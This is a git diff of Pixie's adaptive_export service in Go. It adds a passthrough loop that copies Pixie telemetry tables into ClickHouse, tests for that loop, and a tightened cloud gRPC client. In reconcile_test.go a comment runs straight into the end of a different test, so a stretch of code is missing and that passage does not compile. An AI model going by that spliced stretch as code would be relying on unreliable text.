+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/pxl"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/reconcile"
+)
+
+// excludedTables are dropped from the firehose table set: tables that are
+// declared builtin but are not materialised on every cluster, so a
+// passthrough pull against them returns a "Table not found" compilation
+// error every tick (pure log spam, zero rows). http2_messages.beta is the
+// known offender. Removing it here keeps the schema/DDL lists (which still
+// own the table when it DOES exist) untouched.
+var excludedTables = map[string]bool{
+ "http2_messages.beta": true,
+}
+
+// querier matches the cmd-side pixieAdapter wrapper (returns
+// []map[string]any instead of pixieapi.Row) so the loop is decoupled
+// from pxapi internals + trivially fakeable in tests.
+type querier interface {
+ Query(ctx context.Context, src string) ([]map[string]any, error)
+}
+
+// sink writes rows for a specific pixie table to forensic_db..
+type sink interface {
+ WritePixieRows(ctx context.Context, table string, rows []map[string]any) error
+}
+
+// Config carries the env-derived knobs. Window: the rolling lookback the
+// loop's PxL covers each refresh. Refresh: cadence between loop iterations.
+// Tables: which pixie tables to firehose (defaults to clickhouse.PixieTables()
+// when nil/empty).
+type Config struct {
+ Window time.Duration
+ Refresh time.Duration
+ Tables []string
+ // Rec records per-pull read/wrote counts (ADAPTIVE_RECONCILE). nil →
+ // defaulted to reconcile.Nop{} in New (instrument off).
+ Rec reconcile.Recorder
+ // Hostname is the node name stamped on reconcile rows.
+ Hostname string
+ // Compiled selects the firehose query path. When true (the default
+ // wired by cmd/main.go), per-table PxL is precompiled ONCE at New and
+ // all tables are pulled CONCURRENTLY per tick. When false, the legacy
+ // path is used: QueryFor rebuilds each table's PxL every tick and the
+ // tables are walked serially. The env var ADAPTIVE_PASSTHROUGH_COMPILED
+ // (cmd/main.go) flips this — set it to "false" to revert.
+ Compiled bool
+}
+
+// Loop is the passthrough goroutine.
+type Loop struct {
+ q querier
+ s sink
+ cfg Config
+ // tmpl holds the precompiled per-table PxL templates (table → fmt
+ // template with two %d time-bound verbs). Populated in New only when
+ // cfg.Compiled; nil otherwise.
+ tmpl map[string]string
+}
+
+// New constructs a Loop. Caller-provided querier+sink must already be
+// wired (cmd/main.go builds both unconditionally when ADAPTIVE_PASSTHROUGH
+// is enabled).
+func New(q querier, s sink, cfg Config) *Loop {
+ if cfg.Window <= 0 {
+ cfg.Window = 30 * time.Second
+ }
+ if cfg.Refresh <= 0 {
+ cfg.Refresh = 30 * time.Second
+ }
+ if len(cfg.Tables) == 0 {
+ cfg.Tables = clickhouse.PixieTables()
+ }
+ // Drop tables that aren't materialised on this cluster (e.g.
+ // http2_messages.beta) so they don't error every tick.
+ cfg.Tables = filterExcluded(cfg.Tables)
+ if cfg.Rec == nil {
+ cfg.Rec = reconcile.Nop{}
+ }
+ l := &Loop{q: q, s: s, cfg: cfg}
+ if cfg.Compiled {
+ // Precompile each table's PxL once. The window is fixed for the
+ // lifetime of the loop, so only the per-tick time bounds vary.
+ l.tmpl = make(map[string]string, len(cfg.Tables))
+ for _, table := range cfg.Tables {
+ t, err := pxl.CompilePassthrough(table, cfg.Window)
+ if err != nil {
+ // A non-builtin table can't be compiled; skip it rather
+ // than fail construction (matches the per-table tolerance
+ // of the run loop).
+ log.WithError(err).WithField("table", table).
+ Warn("ADAPTIVE_PASSTHROUGH: precompile skipped")
+ continue
+ }
+ l.tmpl[table] = t
+ }
+ }
+ return l
+}
+
+// filterExcluded returns tables with the excludedTables entries removed,
+// preserving order.
+func filterExcluded(tables []string) []string {
+ out := tables[:0:0]
+ for _, t := range tables {
+ if excludedTables[t] {
+ continue
+ }
+ out = append(out, t)
+ }
+ return out
+}
+
+// rec emits one passthrough reconciliation row (best-effort; Nop when the
+// instrument is off).
+func (l *Loop) rec(ctx context.Context, table string, winStart, winEnd time.Time, read, wrote int, errStr string) {
+ l.cfg.Rec.Record(ctx, reconcile.Row{
+ TS: time.Now(),
+ Mode: "passthrough",
+ Table: table,
+ WinStart: winStart,
+ WinEnd: winEnd,
+ ReadCount: int64(read),
+ WroteCount: int64(wrote),
+ WriteErr: errStr,
+ Hostname: l.cfg.Hostname,
+ })
+}
+
+// Run blocks until ctx is cancelled. On each refresh tick the loop walks
+// the configured tables, queries pixie for the window [now-Window, now)
+// with no ns/pod filter, and writes the resulting rows. Individual table
+// failures are logged but never break the loop — passthrough is a
+// best-effort measurement workload, not the durable write path.
+func (l *Loop) Run(ctx context.Context) {
+ log.WithFields(log.Fields{
+ "window": l.cfg.Window,
+ "refresh": l.cfg.Refresh,
+ "tables": l.cfg.Tables,
+ }).Info("ADAPTIVE_PASSTHROUGH: firehose loop starting")
+
+ // Fire immediately so the first window doesn't have to wait `Refresh`.
+ l.tick(ctx)
+
+ t := time.NewTicker(l.cfg.Refresh)
+ defer t.Stop()
+ for {
+ select {
+ case <-ctx.Done():
+ log.Info("ADAPTIVE_PASSTHROUGH: firehose loop stopped")
+ return
+ case <-t.C:
+ l.tick(ctx)
+ }
+ }
+}
+
+// tick runs one passthrough sweep across every configured table. When
+// cfg.Compiled (the default) all tables are pulled CONCURRENTLY using the
+// precompiled templates; otherwise they are walked serially with QueryFor
+// rebuilt per tick (legacy path, kept for rollback via the env var).
+func (l *Loop) tick(ctx context.Context) {
+ now := time.Now()
+ sliceStart := now.Add(-l.cfg.Window)
+ sliceEnd := now
+
+ if l.cfg.Compiled {
+ l.tickConcurrent(ctx, sliceStart, sliceEnd)
+ return
+ }
+ for _, table := range l.cfg.Tables {
+ if ctx.Err() != nil {
+ return
+ }
+ // Empty Target: namespace+pod predicates are SKIPPED inside
+ // QueryFor, so the PxL DataFrame returns ALL rows in the window.
+ // This is the bypass that makes the A/B measurement meaningful.
+ src, err := pxl.QueryFor(table, anomaly.Target{}, sliceStart, sliceEnd, now)
+ if err != nil {
+ log.WithError(err).WithField("table", table).Warn("ADAPTIVE_PASSTHROUGH: QueryFor failed")
+ l.rec(ctx, table, sliceStart, sliceEnd, 0, 0, err.Error())
+ continue
+ }
+ l.pull(ctx, table, src, sliceStart, sliceEnd)
+ }
+}
+
+// tickConcurrent fires every table's precompiled query at once and waits
+// for all to finish. Per-table failures are isolated inside pull, so one
+// table's error never affects another.
+func (l *Loop) tickConcurrent(ctx context.Context, sliceStart, sliceEnd time.Time) {
+ var wg sync.WaitGroup
+ for _, table := range l.cfg.Tables {
+ if ctx.Err() != nil {
+ break
+ }
+ tmpl, ok := l.tmpl[table]
+ if !ok {
+ // Non-builtin table skipped at precompile time.
+ continue
+ }
+ src := pxl.Render(tmpl, sliceStart, sliceEnd)
+ wg.Add(1)
+ go func(table, src string) {
+ defer wg.Done()
+ l.pull(ctx, table, src, sliceStart, sliceEnd)
+ }(table, src)
+ }
+ wg.Wait()
+}
+
+// pull runs one table's query, writes the rows, and records the reconcile
+// row. It is safe for concurrent use across distinct tables: the querier,
+// sink, and recorder are all pool/HTTP-backed and concurrency-safe, and
+// each call touches a different forensic_db..
+func (l *Loop) pull(ctx context.Context, table, src string, sliceStart, sliceEnd time.Time) {
+ // Bound this table's external query+write+record so a hung dependency can't
+ // stall the whole sweep or delay shutdown (CodeRabbit). Derived per-table
+ // from the parent ctx; covers both the serial and concurrent tick paths.
+ ctx, cancel := context.WithTimeout(ctx, l.cfg.Refresh)
+ defer cancel()
+ rows, err := l.q.Query(ctx, src)
+ if err != nil {
+ log.WithError(err).WithField("table", table).Warn("ADAPTIVE_PASSTHROUGH: pixie query failed")
+ l.rec(ctx, table, sliceStart, sliceEnd, 0, 0, err.Error())
+ return
+ }
+ if len(rows) == 0 {
+ log.WithField("table", table).Debug("ADAPTIVE_PASSTHROUGH: 0 rows")
+ l.rec(ctx, table, sliceStart, sliceEnd, 0, 0, "")
+ return
+ }
+ if err := l.s.WritePixieRows(ctx, table, rows); err != nil {
+ log.WithError(err).WithFields(log.Fields{
+ "table": table,
+ "rows": len(rows),
+ }).Warn("ADAPTIVE_PASSTHROUGH: sink write failed")
+ l.rec(ctx, table, sliceStart, sliceEnd, len(rows), 0, err.Error())
+ return
+ }
+ log.WithFields(log.Fields{
+ "table": table,
+ "rows": len(rows),
+ }).Info("ADAPTIVE_PASSTHROUGH: rows written")
+ l.rec(ctx, table, sliceStart, sliceEnd, len(rows), len(rows), "")
+}
diff --git a/src/vizier/services/adaptive_export/internal/passthrough/passthrough_test.go b/src/vizier/services/adaptive_export/internal/passthrough/passthrough_test.go
new file mode 100644
index 00000000000..e1653da02a8
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/passthrough/passthrough_test.go
@@ -0,0 +1,230 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package passthrough
+
+import (
+ "context"
+ "errors"
+ "strings"
+ "sync"
+ "sync/atomic"
+ "testing"
+ "time"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse"
+)
+
+type fakeQuerier struct {
+ mu sync.Mutex
+ calls []string // PxL sources received
+ row map[string]any
+ err error
+}
+
+func (f *fakeQuerier) Query(_ context.Context, src string) ([]map[string]any, error) {
+ f.mu.Lock()
+ f.calls = append(f.calls, src)
+ f.mu.Unlock()
+ if f.err != nil {
+ return nil, f.err
+ }
+ return []map[string]any{f.row}, nil
+}
+
+type fakeSink struct {
+ mu sync.Mutex
+ writes map[string]int // table → row count
+ failFor string
+}
+
+func newFakeSink() *fakeSink { return &fakeSink{writes: map[string]int{}} }
+
+func (f *fakeSink) WritePixieRows(_ context.Context, table string, rows []map[string]any) error {
+ f.mu.Lock()
+ defer f.mu.Unlock()
+ if f.failFor == table {
+ return errors.New("fakeSink: forced failure")
+ }
+ f.writes[table] += len(rows)
+ return nil
+}
+
+// TestLoop_DefaultsTablesToPixieTables — when Config.Tables is unset, the
+// loop must walk every clickhouse.PixieTables() entry MINUS the passthrough
+// exclusions (see excludedTables in passthrough.go — tables that aren't
+// materialised on every cluster). This is the contract the A/B measurement
+// depends on (a missing table silently drops a column from the capture-
+// fraction matrix).
+func TestLoop_DefaultsTablesToPixieTables(t *testing.T) {
+ q := &fakeQuerier{row: map[string]any{"upid": "x", "time_": time.Now()}}
+ s := newFakeSink()
+ l := New(q, s, Config{Window: 1 * time.Second, Refresh: 1 * time.Hour})
+
+ ctx, cancel := context.WithCancel(context.Background())
+ defer cancel()
+ l.tick(ctx)
+
+ expected := filterExcluded(clickhouse.PixieTables())
+ if len(s.writes) != len(expected) {
+ t.Fatalf("wrote %d tables, want %d", len(s.writes), len(expected))
+ }
+ for _, want := range expected {
+ if s.writes[want] != 1 {
+ t.Fatalf("table %q: wrote %d rows, want 1", want, s.writes[want])
+ }
+ }
+ // And the excluded tables must NOT have been written.
+ for excl := range excludedTables {
+ if got, ok := s.writes[excl]; ok {
+ t.Fatalf("excluded table %q was written %d times — exclusion list out of sync with passthrough.New", excl, got)
+ }
+ }
+}
+
+// TestLoop_EmitsEmptyTargetPxL — the firehose semantics require the PxL
+// to omit the namespace/pod predicates entirely. The whole A/B
+// experiment is meaningful only if the EVERYTHING phase truly does NOT
+// filter rows.
+func TestLoop_EmitsEmptyTargetPxL(t *testing.T) {
+ q := &fakeQuerier{row: map[string]any{"upid": "x", "time_": time.Now()}}
+ s := newFakeSink()
+ l := New(q, s, Config{Window: 1 * time.Second, Refresh: 1 * time.Hour})
+
+ l.tick(context.Background())
+
+ for _, src := range q.calls {
+ // pxl.QueryFor with empty Target writes neither "df.namespace ==" nor
+ // "df.pod ==" predicates. If either appears, the loop is silently
+ // filtering and the A/B comparison is invalid.
+ if strings.Contains(src, "df.namespace ==") {
+ t.Fatalf("passthrough PxL contains namespace filter — A/B invariant broken:\n%s", src)
+ }
+ if strings.Contains(src, "df.pod ==") {
+ t.Fatalf("passthrough PxL contains pod filter — A/B invariant broken:\n%s", src)
+ }
+ }
+}
+
+// TestLoop_TickContinuesPastTableFailure — a single table failing
+// (query error OR sink error) must not block subsequent tables in the
+// same tick. Otherwise a transient pixie 500 on http_events would
+// silently drop conn_stats, redis_events, etc. from that window.
+func TestLoop_TickContinuesPastTableFailure(t *testing.T) {
+ q := &fakeQuerier{row: map[string]any{"upid": "x", "time_": time.Now()}}
+ s := newFakeSink()
+ s.failFor = "http_events" // sink rejects the first table
+ l := New(q, s, Config{
+ Window: 1 * time.Second,
+ Refresh: 1 * time.Hour,
+ Tables: []string{"http_events", "conn_stats", "dns_events"},
+ })
+
+ l.tick(context.Background())
+
+ if s.writes["http_events"] != 0 {
+ t.Fatalf("http_events should NOT have written: %d rows", s.writes["http_events"])
+ }
+ if s.writes["conn_stats"] != 1 || s.writes["dns_events"] != 1 {
+ t.Fatalf("tables after the failure should still write: conn_stats=%d dns_events=%d",
+ s.writes["conn_stats"], s.writes["dns_events"])
+ }
+}
+
+// TestLoop_RunFiresImmediately — the first tick must happen on Run
+// entry (not after one Refresh). Otherwise a 30s default Refresh would
+// add 30s of "AE-FILTER" baseline mixing into the EVERYTHING phase's
+// first window when the operator boots into passthrough mode.
+func TestLoop_RunFiresImmediately(t *testing.T) {
+ q := &fakeQuerier{row: map[string]any{"upid": "x", "time_": time.Now()}}
+ s := newFakeSink()
+ l := New(q, s, Config{
+ Window: 1 * time.Second,
+ Refresh: 1 * time.Hour, // ensure the test fails if we wait for the ticker
+ Tables: []string{"http_events"},
+ })
+
+ ctx, cancel := context.WithCancel(context.Background())
+ defer cancel()
+
+ done := make(chan struct{})
+ go func() { l.Run(ctx); close(done) }()
+
+ // Poll briefly — Run's immediate tick should land within ms.
+ deadline := time.After(2 * time.Second)
+ for {
+ s.mu.Lock()
+ got := s.writes["http_events"]
+ s.mu.Unlock()
+ if got == 1 {
+ break
+ }
+ select {
+ case <-deadline:
+ t.Fatalf("first tick did not fire within 2s; got %d writes", got)
+ case <-time.After(10 * time.Millisecond):
+ }
+ }
+ cancel()
+ <-done
+}
+
+// TestNew_AppliesDefaults — Window/Refresh = 0 fall back to 30s, Tables
+// = nil falls back to clickhouse.PixieTables() with excludedTables
+// stripped (see passthrough.go for the rationale). Production cmd/main.go
+// reads optional env knobs into Config; an unset env yields a zero
+// duration and we must not crash with a zero ticker.
+func TestNew_AppliesDefaults(t *testing.T) {
+ l := New(&fakeQuerier{}, newFakeSink(), Config{})
+ if l.cfg.Window != 30*time.Second {
+ t.Fatalf("default Window = %v, want 30s", l.cfg.Window)
+ }
+ if l.cfg.Refresh != 30*time.Second {
+ t.Fatalf("default Refresh = %v, want 30s", l.cfg.Refresh)
+ }
+ if got, want := len(l.cfg.Tables), len(filterExcluded(clickhouse.PixieTables())); got != want {
+ t.Fatalf("default Tables count = %d, want %d", got, want)
+ }
+}
+
+// TestLoop_RespectsContext — a cancelled context mid-tick should stop
+// further table queries (we don't want a 2-min stall on SIGTERM when
+// the loop has 13 tables × N-second pixie roundtrip queued up).
+func TestLoop_RespectsContext(t *testing.T) {
+ var calls atomic.Int32
+ q := &slowQuerier{calls: &calls}
+ s := newFakeSink()
+ l := New(q, s, Config{
+ Window: 1 * time.Second,
+ Refresh: 1 * time.Hour,
+ Tables: []string{"a", "b", "c", "d", "e"},
+ })
+
+ ctx, cancel := context.WithCancel(context.Background())
+ cancel() // cancel before tick starts
+ l.tick(ctx)
+ // All tables should be skipped because ctx.Err() != nil at top of loop.
+ if calls.Load() != 0 {
+ t.Fatalf("expected 0 querier calls after cancel, got %d", calls.Load())
+ }
+}
+
+type slowQuerier struct{ calls *atomic.Int32 }
+
+func (s *slowQuerier) Query(_ context.Context, _ string) ([]map[string]any, error) {
+ s.calls.Add(1)
+ return nil, nil
+}
diff --git a/src/vizier/services/adaptive_export/internal/passthrough/reconcile_test.go b/src/vizier/services/adaptive_export/internal/passthrough/reconcile_test.go
new file mode 100644
index 00000000000..44a546e82b9
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/passthrough/reconcile_test.go
@@ -0,0 +1,247 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package passthrough
+
+import (
+ "context"
+ "errors"
+ "net/http"
+ "net/http/httptest"
+ "strings"
+ "sync/atomic"
+ "testing"
+ "time"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/reconcile"
+ sinkpkg "px.dev/pixie/src/vizier/services/adaptive_export/internal/sink"
+)
+
+// capRec captures every reconcile.Row for assertions.
+type capRec struct{ rows []reconcile.Row }
+
+func (c *capRec) Record(_ context.Context, r reconcile.Row) { c.rows = append(c.rows, r) }
+
+// tableQuerier returns a fixed row count per pixie table, keyed by the
+// `table='X'` token QueryFor embeds in the PxL. An entry of -1 means the
+// query itself fails (to exercise the read-error branch).
+type tableQuerier struct{ n map[string]int }
+
+func (q tableQuerier) Query(_ context.Context, src string) ([]map[string]any, error) {
+ for tbl, n := range q.n {
+ if strings.Contains(src, "table='"+tbl+"'") {
+ if n < 0 {
+ return nil, errors.New("boom")
+ }
+ rows := make([]map[string]any, n)
+ for i := range rows {
+ rows[i] = map[string]any{"time_": int64(i)}
+ }
+ return rows, nil
+ }
+ }
+ return nil, nil
+}
+
+// failSink fails WritePixieRows for tables in `fail`, succeeds otherwise.
+type failSink struct{ fail map[string]bool }
+
+func (s failSink) WritePixieRows(_ context.Context, table string, _ []map[string]any) error {
+ if s.fail[table] {
+ return errors.New("sink down")
+ }
+ return nil
+}
+
+// TestTick_ReconcileRecordsReadVsWrote is the scientific check of the
+// passthrough write-fidelity instrument: for every table pulled in a tick,
+// exactly one reconcile.Row must be emitted, and its (ReadCount, WroteCount)
+// must reflect the actual read/write outcome — the basis for localizing
+// loss to query (readwrote — the exact shape a sink-drop bug
+ // produces, which a count-only check would miss.
+ if r := got["conn_stats"]; r[0] <= r[1] {
+ t.Errorf("conn_stats read(%d) must exceed wrote(%d) on sink failure", r[0], r[1])
+ }
+}
+
+// TestNew_DefaultsRecorderToNop proves the instrument is OFF (no panic on a
+// nil Recorder) unless explicitly wired.
+func TestNew_DefaultsRecorderToNop(t *testing.T) {
+ loop := New(tableQuerier{n: map[string]int{"http_events": 1}}, failSink{},
+ Config{Window: time.Second, Tables: []string{"http_events"}})
+ // Must not panic with Rec unset.
+ loop.tick(context.Background())
+}
+
+// TestTick_ReconcileCatchesCHSilentDrop — the production-meaningful
+// counterpart to TestTick_ReconcileRecordsReadVsWrote: replaces the
+// in-process fake sink with a real sink.ClickHouseHTTP pointed at an
+// httptest server that mimics CH's X-ClickHouse-Summary silent-drop
+// shape (200 OK + written_rows=0 in the header). The loop must see
+// the silent drop as an error (sink.summaryWroteFewerThan returns
+// non-nil) and record WroteCount=0, ReadCount=N. This is the EXACT
+// regression an R6 (sink-layer loss) reconcile run must detect; the
+// fake-sink test only proves the wiring, this test proves the chain
+// works end-to-end.
+func TestTick_ReconcileCatchesCHSilentDrop(t *testing.T) {
+ const (
+ table = "http_events"
+ nRows = 5
+ )
+ // Counter so we can assert the loop actually called the sink once
+ // (one tick × one table = one POST).
+ var posts atomic.Int32
+ ch := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+ posts.Add(1)
+ // Emulate CH's silent-drop response: 200 OK with summary that
+ // says "0 rows written" despite a non-empty body. AE's sink
+ // turns this into a Go error via summaryWroteFewerThan.
+ w.Header().Set("X-ClickHouse-Summary", `{"written_rows":"0"}`)
+ w.WriteHeader(http.StatusOK)
+ }))
+ defer ch.Close()
+
+ s, err := sinkpkg.New(sinkpkg.Config{Endpoint: ch.URL, Database: "forensic_db"})
+ if err != nil {
+ t.Fatalf("sink.New: %v", err)
+ }
+ rec := &capRec{}
+ loop := New(
+ tableQuerier{n: map[string]int{table: nRows}},
+ s,
+ Config{
+ Window: 60 * time.Second,
+ Tables: []string{table},
+ Rec: rec,
+ Hostname: "node-test",
+ },
+ )
+ loop.tick(context.Background())
+
+ if posts.Load() != 1 {
+ t.Fatalf("CH endpoint hit %d times, want 1", posts.Load())
+ }
+ if len(rec.rows) != 1 {
+ t.Fatalf("recorded %d reconcile rows, want 1", len(rec.rows))
+ }
+ row := rec.rows[0]
+ if row.Table != table {
+ t.Fatalf("Table=%q want %q", row.Table, table)
+ }
+ if row.ReadCount != int64(nRows) {
+ t.Fatalf("ReadCount=%d, want %d (read from querier)", row.ReadCount, nRows)
+ }
+ if row.WroteCount != 0 {
+ t.Fatalf("WroteCount=%d, want 0 (CH silent-drop must land here, not at %d)", row.WroteCount, nRows)
+ }
+ if !strings.Contains(row.WriteErr, "silent drop") && !strings.Contains(row.WriteErr, "written_rows") {
+ t.Fatalf("WriteErr=%q, want CH silent-drop attribution", row.WriteErr)
+ }
+}
+
+// TestTick_ReconcileAttributesCHFailureCorrectly — the dual to
+// CHSilentDrop: when CH returns an actual 5xx, the loop must record
+// the same (read=N, wrote=0) shape with a different WriteErr. Proves
+// the loop's read-count vs wrote-count split is sink-error-agnostic
+// (it's the COUNT that matters for R6 attribution, not the specific
+// failure mode).
+func TestTick_ReconcileAttributesCHFailureCorrectly(t *testing.T) {
+ const (
+ table = "dns_events"
+ nRows = 7
+ )
+ ch := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
+ w.WriteHeader(http.StatusInternalServerError)
+ _, _ = w.Write([]byte("Memory limit exceeded"))
+ }))
+ defer ch.Close()
+
+ s, err := sinkpkg.New(sinkpkg.Config{Endpoint: ch.URL, Database: "forensic_db"})
+ if err != nil {
+ t.Fatalf("sink.New: %v", err)
+ }
+ rec := &capRec{}
+ loop := New(
+ tableQuerier{n: map[string]int{table: nRows}},
+ s,
+ Config{
+ Window: 60 * time.Second,
+ Tables: []string{table},
+ Rec: rec,
+ Hostname: "node-test",
+ },
+ )
+ loop.tick(context.Background())
+
+ if len(rec.rows) != 1 {
+ t.Fatalf("recorded %d reconcile rows, want 1", len(rec.rows))
+ }
+ row := rec.rows[0]
+ if row.ReadCount != int64(nRows) || row.WroteCount != 0 {
+ t.Fatalf("got (read,wrote)=(%d,%d) want (%d,0)", row.ReadCount, row.WroteCount, nRows)
+ }
+ if !strings.Contains(row.WriteErr, "500") && !strings.Contains(row.WriteErr, "Memory") {
+ t.Fatalf("WriteErr=%q, want 500/Memory attribution", row.WriteErr)
+ }
+}
diff --git a/src/vizier/services/adaptive_export/internal/pixie/pixie.go b/src/vizier/services/adaptive_export/internal/pixie/pixie.go
index feb8cadd698..e62c2a323d1 100644
--- a/src/vizier/services/adaptive_export/internal/pixie/pixie.go
+++ b/src/vizier/services/adaptive_export/internal/pixie/pixie.go
@@ -14,12 +14,18 @@
//
// SPDX-License-Identifier: Apache-2.0
+// Package pixie is a thin gRPC wrapper around Pixie cloud's
+// PluginService — used by adaptive_export at boot only, to ensure the
+// ClickHouse retention plugin is enabled. Retention scripts themselves
+// (the PxL that Pixie runs to populate forensic_db.) are
+// user-defined via the Pixie UI; this package does NOT manage them.
package pixie
import (
"context"
"crypto/tls"
"fmt"
+ "net"
"strings"
"github.com/gogo/protobuf/types"
@@ -38,6 +44,7 @@ const (
exportURLConfig = "exportURL"
)
+// Client wraps a gRPC connection to Pixie cloud's PluginService.
type Client struct {
cloudAddr string
ctx context.Context
@@ -46,43 +53,72 @@ type Client struct {
pluginClient cloudpb.PluginServiceClient
}
+// NewClient dials the Pixie cloud and authenticates with apiKey via
+// the per-call metadata header.
+//
+// Auth choice — why API key here, not a service JWT.
+// Two different gRPC perimeters are talked to from AE:
+// 1. This package (pixie.Client) targets the Pixie CLOUD (cloudpb's
+// PluginService): enabling the ClickHouse retention plugin, syncing
+// preset retention scripts. The cloud's auth interceptor accepts the
+// `pixie-api-key` header for external clients and resolves it to an
+// org. JWT service tokens minted with PL_JWT_SIGNING_KEY are only
+// trusted by INSIDE-cluster vizier services (kelvin, metadata,
+// query_broker); cloud rejects them. See
+// src/cloud/api/controllers/auth_grpc.go:62 for the cloud-side
+// "pixie-api-key" handler and src/api/go/pxapi/client.go:117 for
+// pixie's own SDK using the same header.
+// 2. pixieapi.Adapter (internal/pixieapi) targets vizier DIRECTLY
+// (vizierpb.VizierService at query-broker / PEM direct-query) and
+// correctly uses JWT via jwtutils.GenerateJWTForService — the same
+// pattern as cloud_connector/vizhealth/checker.go:111 and
+// query_broker/script_runner/script_runner.go:248.
+//
+// So: this NewClient must take an API key; flipping it to JWT would
+// break cloud auth, not improve it.
func NewClient(ctx context.Context, apiKey string, cloudAddr string) (*Client, error) {
if apiKey == "" {
- fmt.Println("WARNING: API key is empty!")
+ return nil, fmt.Errorf("pixie: empty API key")
}
-
c := &Client{
cloudAddr: cloudAddr,
ctx: metadata.AppendToOutgoingContext(ctx, "pixie-api-key", apiKey),
}
-
if err := c.init(); err != nil {
return nil, err
}
-
return c, nil
}
func (c *Client) init() error {
- isInternal := strings.ContainsAny(c.cloudAddr, "cluster.local")
-
- tlsConfig := &tls.Config{InsecureSkipVerify: isInternal}
+ host := c.cloudAddr
+ if h, _, err := net.SplitHostPort(c.cloudAddr); err == nil {
+ host = h
+ }
+ isInternal := host == "cluster.local" || strings.HasSuffix(host, ".cluster.local")
+ tlsConfig := &tls.Config{
+ InsecureSkipVerify: isInternal, //nolint:gosec // in-cluster vizier traffic only
+ MinVersion: tls.VersionTLS12,
+ }
creds := credentials.NewTLS(tlsConfig)
-
conn, err := grpc.Dial(c.cloudAddr, grpc.WithTransportCredentials(creds))
if err != nil {
return err
}
-
c.grpcConn = conn
c.pluginClient = cloudpb.NewPluginServiceClient(conn)
return nil
}
+// ClickHousePluginConfig is the minimal config the ensure-on path needs.
+type ClickHousePluginConfig struct {
+ ExportURL string
+}
+
+// GetClickHousePlugin returns the ClickHouse retention plugin descriptor,
+// or an error if it is not registered with the cloud.
func (c *Client) GetClickHousePlugin() (*cloudpb.Plugin, error) {
- req := &cloudpb.GetPluginsRequest{
- Kind: cloudpb.PK_RETENTION,
- }
+ req := &cloudpb.GetPluginsRequest{Kind: cloudpb.PK_RETENTION}
resp, err := c.pluginClient.GetPlugins(c.ctx, req)
if err != nil {
return nil, err
@@ -92,44 +128,35 @@ func (c *Client) GetClickHousePlugin() (*cloudpb.Plugin, error) {
return plugin, nil
}
}
- return nil, fmt.Errorf("the %s plugin could not be found", clickhousePluginID)
-}
-
-type ClickHousePluginConfig struct {
- ExportURL string
+ return nil, fmt.Errorf("pixie: %s plugin not found", clickhousePluginID)
}
+// GetClickHousePluginConfig returns the current org-level config (the
+// ExportURL the retention plugin is currently writing to), falling back
+// to the plugin's default if no custom URL is set.
func (c *Client) GetClickHousePluginConfig() (*ClickHousePluginConfig, error) {
- req := &cloudpb.GetOrgRetentionPluginConfigRequest{
- PluginId: clickhousePluginID,
- }
+ req := &cloudpb.GetOrgRetentionPluginConfigRequest{PluginId: clickhousePluginID}
resp, err := c.pluginClient.GetOrgRetentionPluginConfig(c.ctx, req)
if err != nil {
return nil, err
}
exportURL := resp.CustomExportUrl
if exportURL == "" {
- exportURL, err = c.getDefaultClickHouseExportURL()
+ info, err := c.pluginClient.GetRetentionPluginInfo(c.ctx,
+ &cloudpb.GetRetentionPluginInfoRequest{PluginId: clickhousePluginID})
if err != nil {
return nil, err
}
+ exportURL = info.DefaultExportURL
}
- return &ClickHousePluginConfig{
- ExportURL: exportURL,
- }, nil
-}
-
-func (c *Client) getDefaultClickHouseExportURL() (string, error) {
- req := &cloudpb.GetRetentionPluginInfoRequest{
- PluginId: clickhousePluginID,
- }
- info, err := c.pluginClient.GetRetentionPluginInfo(c.ctx, req)
- if err != nil {
- return "", err
- }
- return info.DefaultExportURL, nil
+ return &ClickHousePluginConfig{ExportURL: exportURL}, nil
}
+// EnableClickHousePlugin turns the plugin on with the supplied
+// ExportURL. Idempotent on the cloud side: calling Enable when already
+// enabled re-applies the same config without effect. DisablePresets is
+// true so existing user-defined retention scripts (the source of truth
+// for what gets written) are not overwritten by Pixie's preset set.
func (c *Client) EnableClickHousePlugin(config *ClickHousePluginConfig, version string) error {
req := &cloudpb.UpdateRetentionPluginConfigRequest{
PluginId: clickhousePluginID,
@@ -146,36 +173,12 @@ func (c *Client) EnableClickHousePlugin(config *ClickHousePluginConfig, version
return err
}
-// DisableClickHousePlugin flips the retention plugin off without touching scripts.
-// Scripts are expected to be removed separately via DeleteDataRetentionScript.
-func (c *Client) DisableClickHousePlugin(version string) error {
- req := &cloudpb.UpdateRetentionPluginConfigRequest{
- PluginId: clickhousePluginID,
- Enabled: &types.BoolValue{Value: false},
- Version: &types.StringValue{Value: version},
- }
- _, err := c.pluginClient.UpdateRetentionPluginConfig(c.ctx, req)
- return err
-}
-
-func (c *Client) GetPresetScripts() ([]*script.ScriptDefinition, error) {
- resp, err := c.pluginClient.GetRetentionScripts(c.ctx, &cloudpb.GetRetentionScriptsRequest{})
- if err != nil {
- return nil, err
- }
- var l []*script.ScriptDefinition
- for _, s := range resp.Scripts {
- if s.PluginId == clickhousePluginID && s.IsPreset {
- sd, err := c.getScriptDefinition(s)
- if err != nil {
- return nil, err
- }
- l = append(l, sd)
- }
- }
- return l, nil
-}
-
+// GetClusterScripts returns the retention scripts CURRENTLY installed on
